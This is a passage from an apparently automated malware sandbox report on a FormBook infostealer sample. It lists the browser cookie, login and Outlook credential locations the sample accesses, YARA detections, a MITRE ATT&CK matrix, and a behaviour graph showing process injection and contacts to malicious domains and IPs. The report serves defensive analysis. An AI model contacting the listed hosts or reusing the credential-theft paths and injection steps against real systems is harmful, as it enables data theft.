                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\raserver.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\raserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                    Source: unnervously.exeBinary or memory string: WIN_81
                    Source: unnervously.exeBinary or memory string: WIN_XP
                    Source: unnervously.exeBinary or memory string: WIN_XPe
                    Source: unnervously.exeBinary or memory string: WIN_VISTA
                    Source: unnervously.exeBinary or memory string: WIN_7
                    Source: unnervously.exeBinary or memory string: WIN_8
                    Source: unnervously.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.1307445094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252330585.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3546898290.0000000004EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252898618.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3543179880.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1252099883.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3544967404.0000000004790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3545019349.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3545054686.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_001A6596
                    Source: C:\Users\user\Desktop\CjbMEPJZ3J.exeCode function: 0_2_001A6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_001A6A5A
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00086596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00086596
                    Source: C:\Users\user\AppData\Local\Melba\unnervously.exeCode function: 2_2_00086A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00086A5A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		1
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		4
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		NTDS117
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		LSA Secrets251
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                    Process Injection                    		1
                    Masquerading                    		Cached Domain Credentials2
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631771 Sample: CjbMEPJZ3J.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 44 www.l54354.xyz 2->44 46 www.autoluxmod.xyz 2->46 48 17 other IPs or domains 2->48 68 Suricata IDS alerts for network traffic 2->68 70 Antivirus detection for URL or domain 2->70 72 Antivirus / Scanner detection for submitted sample 2->72 76 6 other signatures 2->76 11 CjbMEPJZ3J.exe 6 2->11         started        15 wscript.exe 1 2->15         started        signatures3 74 Performs DNS queries to domains with low reputation 46->74 process4 file5 42 C:\Users\user\AppData\...\unnervously.exe, PE32 11->42 dropped 82 Binary is likely a compiled AutoIt script file 11->82 17 unnervously.exe 3 11->17         started        84 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->84 21 unnervously.exe 2 15->21         started        signatures6 process7 file8 40 C:\Users\user\AppData\...\unnervously.vbs, data 17->40 dropped 56 Antivirus detection for dropped file 17->56 58 Multi AV Scanner detection for dropped file 17->58 60 Binary is likely a compiled AutoIt script file 17->60 66 2 other signatures 17->66 23 svchost.exe 17->23         started        62 Writes to foreign memory regions 21->62 64 Maps a DLL or memory area into another process 21->64 26 svchost.exe 21->26         started        signatures9 process10 signatures11 80 Maps a DLL or memory area into another process 23->80 28 RFZmq3QsG0cUeEpW31gsA.exe 23->28 injected process12 signatures13 86 Found direct / indirect Syscall (likely to bypass EDR) 28->86 31 raserver.exe 13 28->31         started        process14 signatures15 88 Tries to steal Mail credentials (via file / registry access) 31->88 90 Tries to harvest and steal browser information (history, passwords, etc) 31->90 92 Modifies the context of a thread in another process (thread injection) 31->92 94 3 other signatures 31->94 34 RFZmq3QsG0cUeEpW31gsA.exe 31->34 injected 38 firefox.exe 31->38         started        process16 dnsIp17 50 ns109.l4y.cn 45.119.52.109, 49712, 49713, 49714 CLOUDIE-AS-APCloudieLimitedHK China 34->50 52 www.asianoilporn.xyz 109.206.161.15, 49708, 49709, 49710 SERVEREL-ASNL Netherlands 34->52 54 9 other IPs or domains 34->54 78 Found direct / indirect Syscall (likely to bypass EDR) 34->78 signatures18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.